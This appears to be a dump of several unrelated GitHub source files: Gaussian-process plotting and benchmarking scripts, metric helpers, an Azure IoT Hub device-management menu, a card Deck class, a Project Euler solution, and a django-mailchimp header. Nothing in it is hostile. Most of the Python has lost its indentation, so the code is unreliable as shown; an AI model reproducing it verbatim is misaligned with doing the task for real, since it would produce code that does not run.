plt.plot(grid_1d, y_1d)
plt.title("NLL vs Path")
plt.xlabel(plot_xaxis)
plt.ylabel("Negative log likelihood")
plt.show()
plt.figure()
plt.semilogy()
plt.plot(grid_1d, gradient_norm)
plt.title("Log gradient norm vs Path")
plt.xlabel(plot_xaxis)
plt.ylabel("Log gradient norm of negative log likelihood")
plt.show()
def plot_neg_likelihood_var(model):
var_init = model.Mat52.variance.values[0]
cost_var_init = model._objective_grads(model.optimizer_array)[0]
grid_1d = np.linspace(-1, 1, 2001)
grid_1d = [var_init * math.exp(x * math.log(10)) for x in grid_1d]
y_1d = []
for x in grid_1d:
model.Mat52.variance = x
y_1d.append((model._objective_grads(model.optimizer_array)[0]))
plt.figure()
plt.semilogx()
plt.plot(grid_1d, y_1d)
plt.title("Negative log likelihood vs var : lengthscales : [{}, {}]".format(model.Mat52.lengthscale[0],
model.Mat52.lengthscale[1]))
plt.xlabel("var")
plt.ylabel("Negative log likelihood")
plt.vlines(var_init, ymin=min(y_1d), ymax=max(y_1d), label='estimated_var : {0:.3f}, nll : {1:.3f}'.format(var_init, cost_var_init))
plt.legend()
plt.show()
def plot_multistart_optimization(model, n, mean_value,
variance_value,
optimum,
init_type):
model.constmap.C = mean_value
model.Mat52.variance = variance_value
bounds = [-1, 1]
log_rho_data = np.random.random((n, 2)) * (bounds[1] - bounds[0]) + bounds[0] + np.log10(optimum)
rho_data = np.exp(log_rho_data * math.log(10))
data = pd.DataFrame({'rho1': [], 'rho2': [], 'sigma2': [], 'm': [], 'cost': [], 'status': []})
for rho in rho_data:
model.Mat52.lengthscale = rho
if init_type == 'profiled':
model = gpy_estimation_lib.analytical_mean_and_variance_optimization(model)
elif init_type == 'classic':
model.constmap.C = model.Y.mean()
model.kern.variance = model.Y.var()
else:
            raise ValueError(init_type)
optim = model.optimize()
data = data.append(pd.DataFrame({'rho1': [model.Mat52.lengthscale[0]],
'rho2': [model.Mat52.lengthscale[1]],
'sigma2': model.Mat52.variance,
'm': [model.constmap.C],
'cost': [model._objective_grads(model.optimizer_array)[0]],
'status': optim.status}),
ignore_index=True)
colors = {"Errorb'ABNORMAL_TERMINATION_IN_LNSRCH'": 'red', 'Converged': 'blue', 'Maximum number of f evaluations reached': 'green'}
if not data['status'].apply(lambda x: x in colors.keys()).min():
raise ValueError('Unknown status : {}'.format(data['status'].unique()))
plt.figure()
plt.scatter(x=np.log10(data['rho1']), y=np.log10(data['rho2']),
c=data['status'].apply(lambda x: colors[x]))
plt.scatter(x=math.log10(optimum[0]), y=math.log10(optimum[1]), c='k')
plt.xlabel("ln(rho_1)")
plt.ylabel("ln(rho_2)")
plt.vlines(x=math.log(10) * bounds[0] + math.log10(optimum[0]),
ymin=math.log(10) * bounds[0] + math.log10(optimum[1]),
ymax=math.log(10) * bounds[1] + math.log10(optimum[1]),
linestyles="--", colors="g")
plt.vlines(x=math.log(10) * bounds[1] + math.log10(optimum[0]),
ymin=math.log(10) * bounds[0] + math.log10(optimum[1]),
ymax=math.log(10) * bounds[1] + math.log10(optimum[1]),
linestyles="--", colors="g")
plt.hlines(y=math.log(10) * bounds[0] + math.log10(optimum[1]),
xmin=math.log(10) * bounds[0] + math.log10(optimum[0]),
xmax=math.log(10) * bounds[1] + math.log10(optimum[0]),
linestyles="--", colors="g")
plt.hlines(y=math.log(10) * bounds[1] + math.log10(optimum[1]),
xmin=math.log(10) * bounds[0] + math.log10(optimum[0]),
xmax=math.log(10) * bounds[1] + math.log10(optimum[0]),
linestyles="--", colors="g")
plt.plot([math.log10(optimum[0]) - 2, math.log10(optimum[0]) + 2],
[math.log10(optimum[1]) - 2, math.log10(optimum[1]) + 2],
label='constant anisotropy')
plt.legend()
plt.title(init_type)
plt.show()
#############################################
plt.figure()
plt.scatter(x=np.log10(data['rho1']), y=np.log10(data['sigma2']),
c=data['status'].apply(lambda x: colors[x]))
plt.scatter(x=math.log10(optimum[0]), y=math.log10(variance_value), c='k')
plt.vlines(x=math.log(10) * bounds[0] + math.log10(optimum[0]), ymin=np.log10(data['sigma2']).min(), ymax=np.log10(data['sigma2']).max(),
linestyles="--", colors="g")
plt.vlines(x=math.log(10) * bounds[1] + math.log10(optimum[0]), ymin=np.log10(data['sigma2']).min(), ymax=np.log10(data['sigma2']).max(),
linestyles="--", colors="g")
plt.plot([np.log10(data['rho1']).min(), np.log10(data['rho1']).max()],
[math.log10(variance_value) - (math.log10(optimum[0]) - np.log10(data['rho1']).min())*5,
math.log10(variance_value) + (np.log10(data['rho1']).max() - math.log10(optimum[0]))*5], label='constant microergodicity')
plt.xlabel("ln(rho_1)")
plt.ylabel("ln(sigma2)")
plt.legend()
plt.title(init_type)
plt.show()
return data
def get_noise_level(x, y):
sk_model = sklearn.linear_model.LinearRegression(fit_intercept=True)
X_data = np.concatenate((np.array(x).reshape(-1, 1), (np.array(x)**2).reshape(-1, 1)), axis=1)
Y_data = np.array(y).reshape(-1, 1)
sk_model.fit(X_data, Y_data)
print("noise level (std) : {}".format((Y_data - sk_model.predict(X_data)).std(ddof=3)))
def plot_taylor(model, idx_param, diagonalize=False, width=1e-2, n=1000):
obj_value, grad = model._objective_grads(model.optimizer_array)
print("obj value : {}".format(obj_value))
hessian, model = gpy_finite_diff.get_hessian(model)
if diagonalize:
v, W = np.linalg.eig(hessian)
direction = W[:, idx_param]
else:
direction = np.zeros([model.optimizer_array.shape[0]])
direction[idx_param] = 1
array = model.optimizer_array.copy()
dx_vector = np.linspace(-width / 2, width / 2, n)
y = []
y_order_1 = []
y_order_2 = []
for dx in dx_vector:
d = direction.copy() * dx
obj, _ = model._objective_grads(model.optimizer_array + d)
y.append(obj)
model.optimizer_array = array.copy()
y_order_1.append(obj_value + (d * grad).sum())
y_order_2.append(obj_value + (d * grad).sum() + 0.5 * (d.reshape(1, -1) @ hessian @ d.reshape(-1, 1))[0, 0])
fig, ax = plt.subplots()
plt.plot(dx_vector, y, label="NLL")
##############################################
sk_model = sklearn.linear_model.LinearRegression(fit_intercept=True)
X_data = np.concatenate((np.array(dx_vector).reshape(-1, 1), (np.array(dx_vector)**2).reshape(-1, 1)), axis=1)
Y_data = np.array(y).reshape(-1, 1)
sk_model.fit(X_data, Y_data)
plt.plot(dx_vector, sk_model.predict(X_data), label='Best linear fit')
##############################################
ax.ticklabel_format(useOffset=False)
plt.axvline(x=0, color='red', label='')
plt.legend()
plt.show()
get_noise_level(dx_vector, y)
def decompose_all(model, idx_param, diagonalize=False, width=1e-2, n=1000):
obj_value, grad = model._objective_grads(model.optimizer_array)
print("obj value : {}".format(obj_value))
hessian, model = gpy_finite_diff.get_hessian(model)
if diagonalize:
v, W = np.linalg.eig(hessian)
# Slow variation direction : array([ 9.99997623e-01, -2.06640309e-03, -4.50014843e-04, -5.31242312e-04])
direction = W[:, idx_param]
eig_value = v[idx_param]
else:
direction = np.zeros([model.optimizer_array.shape[0]])
direction[idx_param] = 1
array = model.optimizer_array.copy()
dx_vector = np.linspace(-width / 2, width / 2, n)
y_data = []
y_reg = []
for dx in dx_vector:
d = direction.copy() * dx
model.optimizer_array = model.optimizer_array + d
m = model.mean_function.f(model.X)
variance = model.likelihood.gaussian_variance(model.Y_metadata)
YYT_factor = model.Y_normalized - m
K = model.kern.K(model.X)
Ky = K.copy()
diag.add(Ky, variance)
Wi, LW, LWi, W_logdet = pdinv(Ky)
alpha, _ = dpotrs(LW, YYT_factor, lower=1)
y_reg.append(0.5*(- model.Y.shape[1] * W_logdet))
y_data.append(0.5*(- np.sum(alpha * YYT_factor)))
model.optimizer_array = array.copy()
plt.subplots(1, 2)
if diagonalize:
plt.suptitle("Eigen axis : {}, eigen value : {} \n eigen vector: ({})".format(idx_param,
"{:.4E}".format(eig_value),
','.join(["{:.6}".format(x) for x in direction])))
else:
plt.suptitle("Axis")
plt.subplot(1, 2, 1)
plt.title("Data term")
plt.plot(dx_vector, y_data, label="Data term")
plt.subplot(1, 2, 2)
plt.title("Regularization term")
plt.plot(dx_vector, y_reg, label="Regularization term")
plt.show()
print("Regularizer")
get_noise_level(dx_vector, y_reg)
print("Data")
get_noise_level(dx_vector, y_data)
def plot_model(model, x_train, y_train, x_grid, y_grid, title):
_, ax = plt.subplots()
plt.plot(x_grid, y_grid, 'k', label='truth')
plt.plot(x_train, y_train, 'ko', label='observed')
mu, var = model.predict(x_grid)
var[var <= 0] = 0
plt.plot(x_grid, mu, 'r', label='mu')
plt.plot(x_grid, mu - np.vectorize(math.sqrt)(var), 'b', label='mu - sigma')
plt.plot(x_grid, mu + np.vectorize(math.sqrt)(var), 'b', label='mu + sigma')
ax.fill_between(x_grid.reshape(-1), (mu - np.vectorize(math.sqrt)(var)).reshape(-1),
(mu + np.vectorize(math.sqrt)(var)).reshape(-1), color='#539caf', alpha=0.4)
plt.legend()
plt.title(title)
plt.show()
```
#### File: libs/utils/metrics_computations.py
```python
import scipy.stats
import numpy as np
import math
def get_gaussian_alpha_coverage(y, mu_pred, var_pred, alpha):
assert mu_pred.shape == var_pred.shape, "Shape issue"
assert isinstance(alpha, float), "alpha must be float"
assert np.all(var_pred > 0)
lower = scipy.stats.norm.ppf((1 - alpha) / 2, loc=mu_pred, scale=np.vectorize(math.sqrt)(var_pred))
upper = scipy.stats.norm.ppf(1 - (1 - alpha) / 2, loc=mu_pred, scale=np.vectorize(math.sqrt)(var_pred))
assert (y.shape == lower.shape) and (y.shape == upper.shape), \
"Shape issue : {}, {} and {}".format(y.shape, lower.shape, upper.shape)
is_alpha_credible = np.logical_and(lower <= y, y <= upper).astype(float)
return is_alpha_credible.mean()
def get_residuals(mu_pred, y):
assert isinstance(mu_pred, np.ndarray) and isinstance(y, np.ndarray), 'Type issue'
assert mu_pred.shape == y.shape and mu_pred.ndim == 1, 'Shape issue'
residuals = y - mu_pred
return residuals
def get_mse(mu_pred, y):
residuals = get_residuals(mu_pred, y)
return (residuals**2).mean()
def get_vse(mu_pred, y):
residuals = get_residuals(mu_pred, y)
return (residuals**2).var()
def get_mae(mu_pred, y):
residuals = get_residuals(mu_pred, y)
return (abs(residuals)).mean()
def get_scaled_mse(mu_pred, var_pred, y):
residuals = get_residuals(mu_pred, y)
assert isinstance(residuals, np.ndarray) and isinstance(var_pred, np.ndarray), 'Type issue'
assert residuals.shape == var_pred.shape and var_pred.ndim == 1, 'Shape issue'
assert np.all(var_pred > 0)
return ((residuals**2) / var_pred).mean()
```
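A small self-contained sketch of how the metric helpers above might be exercised on synthetic data (all numbers are made up purely for illustration):
```python
import numpy as np

rng = np.random.default_rng(0)
y = rng.normal(size=200)
mu_pred = y + rng.normal(scale=0.1, size=200)   # hypothetical predictions
var_pred = np.full(200, 0.01)                   # hypothetical predictive variances

print(get_mse(mu_pred, y))                                     # mean squared error
print(get_scaled_mse(mu_pred, var_pred, y))                    # close to 1 if the variances are calibrated
print(get_gaussian_alpha_coverage(y, mu_pred, var_pred, 0.9))  # empirical coverage of the 90% intervals
```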
#### File: bench/gpy_wrapper_misc/gpy_estimation_lib_restarts_experiments.py
```python
import time
from gpy_wrapper.gpy.libs.utils.gpy_estimation_lib import custom_optimize_restarts, gaussian_random_init, optimize_from_start
import numpy as np
def trainer_all(model, options, profiler=None, ipython_notebook=False, bench_type='single'):
if bench_type == 'single':
ll = launch_sessions_all(model=model, ipython_notebook=ipython_notebook, profiler=profiler, **options)
elif bench_type == 'monte-carlo':
ll = launch_sessions_all_monte_carlo(model=model, ipython_notebook=ipython_notebook, profiler=profiler, **options)
else:
raise ValueError(bench_type)
return ll
def launch_sessions_all(
model,
optim_scheme,
gtol,
bfgs_factor,
ipython_notebook,
profiler
):
status = 'untrained'
ll = {}
idx = 0
start = time.time()
for scheme in optim_scheme:
model, status = custom_optimize_restarts(model=model, n_multistarts=scheme[0],
gtol=gtol, bfgs_factor=bfgs_factor,
std_perturbations=scheme[1],
profiler=profiler,
ipython_notebook=ipython_notebook)
if profiler is not None:
model = profiler(model)
idx += 1
end = time.time()
# For studying the improvements over the restarts
# print("\nscheme : {}, cost : {}".format(scheme, model.objective_function()))
ll[str(scheme) + "_nll_" + str(idx)] = model.objective_function()
ll[str(scheme) + "_time_" + str(idx)] = end - start
return ll
def launch_sessions_all_monte_carlo(
model,
optim_scheme,
gtol,
bfgs_factor,
ipython_notebook,
profiler
):
for scheme in optim_scheme:
model, ll = custom_optimize_restarts_misc(model=model, n_multistarts=scheme[0],
gtol=gtol, bfgs_factor=bfgs_factor,
std_perturbations=scheme[1],
profiler=profiler,
ipython_notebook=ipython_notebook)
if profiler is not None:
model = profiler(model)
return ll
def custom_optimize_restarts_misc(model, n_multistarts, gtol, bfgs_factor, std_perturbations, profiler, ipython_notebook):
assert n_multistarts > 0, "multistarts should be > 0, {}".format(n_multistarts)
std_perturbations_vector = std_perturbations * np.ones([model.optimizer_array.shape[0]])
mean_index = [
i for i in range(model.parameter_names_flat().shape[0])
if 'constmap.C' in model.parameter_names_flat()[i]
]
std_perturbations_vector[mean_index] = model.Y_normalized.std() * std_perturbations_vector[mean_index]
inits = gaussian_random_init(model, n_multistarts, std_perturbations_vector)
scores = []
optimum = []
statuses = []
idx = 0
ll = {}
for x in inits:
assert x.shape == model.optimizer_array.shape, "Shape issue."
model.optimizer_array = x
start = time.time()
model, status = optimize_from_start(model, gtol, bfgs_factor, ipython_notebook)
if profiler is not None:
model = profiler(model)
end = time.time()
optimum.append(model.optimizer_array.copy())
scores.append(model.objective_function())
statuses.append(status)
idx += 1
ll["nll_" + str(idx)] = model.objective_function()
ll["time_" + str(idx)] = end - start
argmin = np.array(scores).argmin()
model.optimizer_array = optimum[argmin]
return model, ll
```
#### File: code/report/multiple_loo_boxplot.py
```python
import matplotlib.pyplot as plt
import os
import pandas as pd
import numpy as np
import sys
# --- README ---
'''
This script generates boxplots of the LOO-estimated lengthscale values
'''
# --- To Run ---
'''
Syntax :
python multiple_loo_boxplot.py bench_num scheme1 scheme2 dataset_name dimension output
Example :
python3 multiple_loo_boxplot.py 2 gpy_mle0133 gpy_mle3021 borehole 20d f_1
'''
# --- Methods ---
bench_num = sys.argv[1]
method = [sys.argv[2], sys.argv[3]]
dataset = [str(sys.argv[4]), sys.argv[5]]
output = str(sys.argv[6])
print('generating box plots for : \n', method)
# --- File name parsing utilities ---
def get_problem_and_dimension(file):
splited_file_name = file.split('_')
problem = "_".join(file.split('_')[0:(len(splited_file_name) - 1)])
d = splited_file_name[len(splited_file_name) - 1].replace('.csv', '')
return problem, d
# --- Let's do the job ---
data_dir = os.path.join(os.path.dirname(os.path.realpath(__file__)), '..', '..', 'results', 'bench2', 'data_no_std', str(method[0]))
data_dir_full = os.path.join(os.path.dirname(os.path.realpath(__file__)), '..', '..', 'results', 'bench1', 'proposed', str(method[0]))
data_dir_1 = os.path.join(os.path.dirname(os.path.realpath(__file__)), '..', '..', 'results', 'bench2', 'data_no_std', str(method[1]))
data_dir_full_1 = os.path.join(os.path.dirname(os.path.realpath(__file__)), '..', '..', 'results', 'bench1', 'proposed', str(method[1]))
# -- Retrieve data from methods ---
def df_generator(data_dir, tag):
for file in os.listdir(data_dir):
problem, d = get_problem_and_dimension(file)
if [problem, d] == dataset:
data = pd.read_csv(os.path.join(data_dir, file), sep=',', index_col=0)
df = pd.DataFrame(data)
ls = []
to_remove = []
for i in df.columns:
if 'ls_dim' in i:
ls.append(i)
else:
to_remove.append(i)
df = df.loc[df['output'] == output]
for i in ls:
df[i] = np.log(df[i])
df = df.dropna()
df = df.drop(to_remove, axis=1)
df['method'] = np.array(df.shape[0]*[tag])
return df
# --- generating dataframes ---
df = df_generator(data_dir, 'default')
df_full = df_generator(data_dir_full, 'default')
df_1 = df_generator(data_dir_1, 'healed')
df_full_1 = df_generator(data_dir_full_1, 'healed')
# --- generating boxplot ---
# data to plot
A = [df['ls_dim_5'], df_1['ls_dim_5']]
B = [df['ls_dim_6'], df_1['ls_dim_6']]
C = [df['ls_dim_7'], df_1['ls_dim_7']]
D = [df['ls_dim_8'], df_1['ls_dim_8']]
A_1 = [df_full['ls_dim_5'], df_full_1['ls_dim_5']]
B_1 = [df_full['ls_dim_6'], df_full_1['ls_dim_6']]
C_1 = [df_full['ls_dim_7'], df_full_1['ls_dim_7']]
D_1 = [df_full['ls_dim_8'], df_full_1['ls_dim_8']]
def color_scheme(bp, bp_1):
for median in bp['medians']:
median.set(color='g', linewidth=2)
for median in bp_1['medians']:
median.set(color='r', linewidth=2)
for box in bp_1['boxes']:
box.set(color='r', linewidth=2)
for whisker in bp_1['whiskers']:
whisker.set(color='r', linewidth=2)
for cap in bp_1['caps']:
cap.set(color='r', linewidth=2)
fig = plt.figure(figsize=(9, 6))
ax = plt.axes()
# first boxplot pair
bp = ax.boxplot(A, positions=[1, 2], widths=0.6)
bp_1 = ax.boxplot(A_1, positions=[1, 2], widths=0.6)
color_scheme(bp, bp_1)
# second boxplot pair
bp = ax.boxplot(B, positions=[4, 5], widths=0.6)
bp_1 = ax.boxplot(B_1, positions=[4, 5], widths=0.6)
color_scheme(bp, bp_1)
# third boxplot pair
bp = ax.boxplot(C, positions=[7, 8], widths=0.6)
bp_1 = ax.boxplot(C_1, positions=[7, 8], widths=0.6)
color_scheme(bp, bp_1)
# fourth boxplot pair
bp = ax.boxplot(D, positions=[10, 11], widths=0.6)
bp_1 = ax.boxplot(D_1, positions=[10, 11], widths=0.6)
color_scheme(bp, bp_1)
# set axes limits and labels
plt.xlim(0, 12)
# plt.ylim(0,9)
ax.set_xticklabels(['1', '2', '3', '4'])
ax.set_xticks([1.5, 4.5, 7.5, 10.5])
plt.xlabel('input dimensions', fontsize=14)
plt.ylabel('lengthscale (in log scale)', fontsize=14)
plt.title('Boxplot of LOO estimated lengthscale')
plt.grid(True)
plt.show()
```
#### File: code/report/nll_boxplot.py
```python
import matplotlib.pyplot as plt
import os
import pandas as pd
import numpy as np
import sys
# --- README ---
'''
This script generates boxplots for NLL differences of default & healed
as obtained with LOO
'''
# --- To Run ---
'''
Syntax :
python nll_boxplot.py bench_num scheme1 scheme2 dataset_name dimension
Example :
python3 nll_boxplot.py 2 gpy_mle0133 gpy_mle3021 g10 3d
'''
# --- Methods ---
bench_num = sys.argv[1]
method = sys.argv[2]
method1 = sys.argv[3]
dataset = [str(sys.argv[4]), sys.argv[5]]
print('generating box plots for : \n', [method, method1])
# --- File name parsing utilities ---
def get_problem_and_dimension(file):
splited_file_name = file.split('_')
problem = "_".join(file.split('_')[0:(len(splited_file_name) - 1)])
d = splited_file_name[len(splited_file_name) - 1].replace('.csv', '')
return problem, d
# --- Let's do the job ---
data_dir = os.path.join(os.path.dirname(os.path.realpath(__file__)), '..', '..', 'results', 'bench2', 'data_no_std', str(method1))
data_dir_full = os.path.join(os.path.dirname(os.path.realpath(__file__)), '..', '..', 'results', 'bench1', 'proposed', str(method1))
data_dir_healed = os.path.join(os.path.dirname(os.path.realpath(__file__)), '..', '..', 'results', 'bench2', 'data_no_std', str(method))
data_dir_full_healed = os.path.join(os.path.dirname(os.path.realpath(__file__)), '..', '..', 'results', 'bench1', 'proposed', str(method))
# -- Retrieve data from methods ---
cost_dict = {}
cost_dict_healed = {}
cost_dict_full = {}
cost_dict_full_healed = {}
for file in os.listdir(data_dir):
problem, d = get_problem_and_dimension(file)
if [problem, d] == dataset:
data = pd.read_csv(os.path.join(data_dir, file), sep=',', index_col=0)[['cost', 'output']]
df = pd.DataFrame(data)
for output in list(df['output']):
cost_dict[output] = list(df.loc[df['output'] == output]['cost'])
for file in os.listdir(data_dir_healed):
problem, d = get_problem_and_dimension(file)
if [problem, d] == dataset:
data = pd.read_csv(os.path.join(data_dir_healed, file), sep=',', index_col=0)[['cost', 'output']]
df = pd.DataFrame(data)
for output in list(df['output']):
cost_dict_healed[output] = list(df.loc[df['output'] == output]['cost'])
for file in os.listdir(data_dir_full):
problem, d = get_problem_and_dimension(file)
if [problem, d] == dataset:
data_full = pd.read_csv(os.path.join(data_dir_full, file), sep=',', index_col=0)[['cost', 'output']]
df_full = pd.DataFrame(data_full)
for output in list(df_full['output']):
cost_dict_full[output] = list(df_full.loc[df_full['output'] == output]['cost'])
for file in os.listdir(data_dir_full_healed):
problem, d = get_problem_and_dimension(file)
if [problem, d] == dataset:
data_full = pd.read_csv(os.path.join(data_dir_full_healed, file), sep=',', index_col=0)[['cost', 'output']]
df_full = pd.DataFrame(data_full)
for output in list(df_full['output']):
cost_dict_full_healed[output] = list(df_full.loc[df_full['output'] == output]['cost'])
# --- Box plot ---
fig = plt.figure(1, figsize=(9, 6))
ax = fig.add_subplot(111)
to_plot = []
to_plot_full = []
for i in list(df_full['output']):
# print('\n\n{}'.format(i))
temp = np.array(cost_dict[i]) - np.array(cost_dict_healed[i])
temp = temp[~np.isnan(temp)]
to_plot.append(temp)
to_plot_full.append(np.array(cost_dict_full[i]) - np.array(cost_dict_full_healed[i]))
plot_type = input('Type "h" for histogram : \n')
if plot_type == 'h':
plt.hist(to_plot, density=False, bins=10, edgecolor='black')
plt.xlabel('NLL_default - NLL_healed', fontsize=14)
plt.ylabel('frequency', fontsize=14)
plt.title('Histogram of NLL differences', fontsize=14)
plt.show()
else:
bp = ax.boxplot(to_plot)
bp1 = ax.boxplot(to_plot_full)
# change color and linewidth of the medians
for median in bp['medians']:
median.set(color='g', linewidth=2)
# change outline color, fill color and linewidth of the boxes
for box in bp1['boxes']:
# change outline color
box.set(color='r', linewidth=2)
# change color and linewidth of the whiskers
for whisker in bp1['whiskers']:
whisker.set(color='r', linewidth=2)
# change color and linewidth of the caps
for cap in bp1['caps']:
cap.set(color='r', linewidth=2)
for median in bp1['medians']:
median.set(color='r', linewidth=2)
plt.xlabel('output functions', fontsize=14)
plt.ylabel('NLL_default - NLL_healed', fontsize=14)
plt.title('Boxplot of difference in LOO estimated NLL of {}'.format(dataset[0] + '_' + str(dataset[1])), fontsize=14)
plt.grid(True)
ax.set_xticklabels(list(df_full['output']))
plt.show()
``` |
{
"source": "Johncon79/AZURE-IOT-Interface",
"score": 2
} |
#### File: Johncon79/AZURE-IOT-Interface/iotserver.py
```python
import sys
import iothub_service_client
from iothub_service_client import IoTHubRegistryManager, IoTHubRegistryManagerAuthMethod
from iothub_service_client import IoTHubDeviceMethod, IoTHubError, IoTHubDeviceTwin
#Enter IOTHub credentials
CONNECTION_STRING = ""
#Device name in iot hub
DEVICE_ID = "Recon"
DEVICE_STATUS=True
METHOD_NAME = ""
METHOD_PAYLOAD = ""
TIMEOUT = 60
TWIN_MSG = "{\"properties\":{\"desired\":{\"Photointerval\":10}}}"
def iothub_devicetwin():
iothub_twin_method = IoTHubDeviceTwin(CONNECTION_STRING)
twin_info = iothub_twin_method.get_twin(DEVICE_ID)
print ( "" )
print ( "Device Twin before update :" )
print ( "{0}".format(twin_info) )
twin_info = iothub_twin_method.update_twin(DEVICE_ID, TWIN_MSG)
print ( "" )
print ( "Device Twin after update :" )
print ( "{0}".format(twin_info) )
def list_devices():
    global DEVICE_STATUS
    print ( "GetDeviceList" )
number_of_devices = 3
iothub_registry_manager = IoTHubRegistryManager(CONNECTION_STRING)
dev_list = iothub_registry_manager.get_device_list(number_of_devices)
number_of_devices = len(dev_list)
print ( "Number of devices : {0}".format(number_of_devices) )
for device in range(0, number_of_devices):
title = "Device " + str(device)
print_device_info(title, dev_list[device])
if dev_list[device].connectionState != "CONNECTED":
DEVICE_STATUS=False
#print(DEVICE_STATUS)
print ( "" )
def print_device_info(title, iothub_device):
print ( title + ":" )
print ( "iothubDevice.deviceId = {0}".format(iothub_device.deviceId) )
print ( "iothubDevice.primaryKey = {0}".format(iothub_device.primaryKey) )
print ( "iothubDevice.secondaryKey = {0}".format(iothub_device.secondaryKey) )
print ( "iothubDevice.generationId = {0}".format(iothub_device.generationId) )
print ( "iothubDevice.eTag = {0}".format(iothub_device.eTag) )
print ( "iothubDevice.connectionState = {0}".format(iothub_device.connectionState) )
print ( "iothubDevice.connectionStateUpdatedTime = {0}".format(iothub_device.connectionStateUpdatedTime) )
print ( "iothubDevice.status = {0}".format(iothub_device.status) )
print ( "iothubDevice.statusReason = {0}".format(iothub_device.statusReason) )
print ( "iothubDevice.statusUpdatedTime = {0}".format(iothub_device.statusUpdatedTime) )
print ( "iothubDevice.lastActivityTime = {0}".format(iothub_device.lastActivityTime) )
print ( "iothubDevice.cloudToDeviceMessageCount = {0}".format(iothub_device.cloudToDeviceMessageCount) )
print ( "iothubDevice.isManaged = {0}".format(iothub_device.isManaged) )
print ( "iothubDevice.configuration = {0}".format(iothub_device.configuration) )
print ( "iothubDevice.deviceProperties = {0}".format(iothub_device.deviceProperties) )
print ( "iothubDevice.serviceProperties = {0}".format(iothub_device.serviceProperties) )
print ( "iothubDevice.authMethod = {0}".format(iothub_device.authMethod) )
print ( "" )
class ConnectionError(Exception):
pass
def methodUpdate(METHOD_NAME, METHOD_PAYLOAD ):
try:
if DEVICE_STATUS == False:
raise ConnectionError()
iothub_device_method = IoTHubDeviceMethod(CONNECTION_STRING)
        #Sends the actual message and receives the response
response = iothub_device_method.invoke(DEVICE_ID, METHOD_NAME, METHOD_PAYLOAD, TIMEOUT)
        #What was sent
print ( "" )
print ( "Device Method called" )
print ( "Device Method name : {0}".format(METHOD_NAME) )
print ( "Device Method payload : {0}".format(METHOD_PAYLOAD) )
print ( "" )
print ( "Response status : {0}".format(response.status) ) #200 kan t.ex vara Success
print ( "Response payload : {0}".format(response.payload) ) #Själva svaret från devicen. Tex Device starta utan problem
#raise IoTHubDeviceMethodError
except:
print("")
print ( "" )
print ( "" )
print("Oops!",sys.exc_info()[0],"occured.")
print("ERROR No deviced connected")
print("")
def iothub_MainMenu():
try:
#Main menu
while True:
print ( "" )
print("1 to list devices ")
print("2 to Start the service")
print("3 To Stop the service")
print("4 To update method")
inp = int((input()))
if inp == 1:
list_devices()
if inp == 2:
METHOD_NAME="Start" #Det som skickas
METHOD_PAYLOAD = "{\"StartService\":\"42\"}"
methodUpdate(METHOD_NAME, METHOD_PAYLOAD)
if inp == 3:
METHOD_NAME="Stop"
METHOD_PAYLOAD = "{\"StopService\":\"42\"}"
methodUpdate(METHOD_NAME, METHOD_PAYLOAD)
if inp == 4:
iothub_devicetwin()
try:
# Try Python 2.xx first
raw_input("Press Enter to continue...\n")
except:
pass
# Use Python 3.xx in the case of exception
input("Press Enter to continue...\n")
except IoTHubError as iothub_error:
print ( "" )
print ( "Unexpected error {0}".format(iothub_error) )
return
print ( "IoT Hub Service Interface" )
iothub_MainMenu()
``` |
{
"source": "JohnConnor94/BlackJackPy",
"score": 4
} |
#### File: BlackJackPy/lib/Deck.py
```python
import random
from lib.Card import Card
class Deck:
_seeds = ("Hearts", "Diamonds", "Clubs", "Spades")
_values = ("A", "2", "3", "4", "5", "6", "7", "8", "9", "10", "J", "Q", "K")
def __init__(self, jolly = False):
self._cards = [Card(v, s) for s in Deck._seeds for v in Deck._values]
if jolly:
self._cards += [("Joker", "Red"), ("Joker", "Black")]
def __len__(self) -> int:
return len(self._cards)
def __str__(self) -> str:
temp = f"Deck {super().__str__()}:\n"
index = 0
while index < len(self):
temp += f"{index + 1} - {self._cards[index]}\n"
index += 1
return temp
def shuffle(self, times = 50):
if times <= 0:
return
remaining_cards = len(self)
# switch 2 random cards n times
for i in range(times):
a = random.randint(0, remaining_cards - 1)
b = random.randint(0, remaining_cards - 1)
self._cards[a], self._cards[b] = self._cards[b], self._cards[a]
def pop_card(self, position = 0):
"""
        Get the card and remove it from the deck
        :param position: position of the card, counting from the top of the deck
        :return: (value, seed) if the position is valid, else None
"""
card = self.watch_card(position)
if card:
            self._cards.pop(position)  # use the list method to remove the card at this position
return card
def watch_card(self, position = 0):
"""
        Get the card without removing it from the deck
        :param position: position of the card, counting from the top of the deck
        :return: (value, seed) if the position is valid, else None
"""
if 0 <= position < len(self):
return self._cards[position]
else:
return None
def all_cards(self) -> []:
"""
        Create a copy of the list of all cards contained in this deck and return it
        :return: copied list with all the cards in the deck
"""
# return self._cards.copy()
return self._cards[:] # faster copy list
``` |
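A minimal usage sketch of the `Deck` class above, assuming it is run from the repository root so that the `lib` package imports resolve; the printed card depends on `Card.__str__`, which is defined elsewhere in the repo:
```python
from lib.Deck import Deck

deck = Deck()
deck.shuffle()
top = deck.pop_card()        # draw the top card and remove it from the deck
print(top, len(deck))        # 51 cards remain
print(deck.watch_card(0))    # peek at the new top card without removing it
```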
{
"source": "JohnConnor94/Project-Euler",
"score": 4
} |
#### File: problem-001/Python/main.py
```python
def sol1(limit) -> int:
"""
Simple solution with for, C-stylish
"""
total = 0
for x in range(limit):
if x % 3 == 0 or x % 5 == 0:
total += x
return total
def sol2(limit) -> int:
"""
A little more pythonic solution with list comprehension to generate the list
"""
total = 0
numbers = [x for x in range(limit) if x % 3 == 0 or x % 5 == 0]
for x in numbers:
total += x
return total
def sol3(limit) -> int:
    """
    A third implementation using a generator expression, so no intermediate list is instantiated
    """
    return sum(x for x in range(limit) if x % 3 == 0 or x % 5 == 0)
def main():
    limit = 1000
    print(sol1(limit))
    print(sol2(limit))
    print(sol3(limit))
main()
``` |
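For comparison, the same answer can be computed in constant time with the arithmetic-series formula plus inclusion-exclusion (multiples of 3, plus multiples of 5, minus multiples of 15, all counted strictly below the limit); a short sketch:
```python
def sol_closed_form(limit: int) -> int:
    def sum_multiples(k: int) -> int:
        n = (limit - 1) // k           # how many multiples of k lie strictly below limit
        return k * n * (n + 1) // 2    # k * (1 + 2 + ... + n)
    return sum_multiples(3) + sum_multiples(5) - sum_multiples(15)

print(sol_closed_form(1000))  # 233168, matching sol1 and sol2
```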
{
"source": "johncosta/django-mailchimp",
"score": 2
} |
#### File: django-mailchimp/mailchimp/models.py
```python
from django.db import models
from django.utils import simplejson
from django.contrib.contenttypes.models import ContentType
from django.contrib.contenttypes import generic
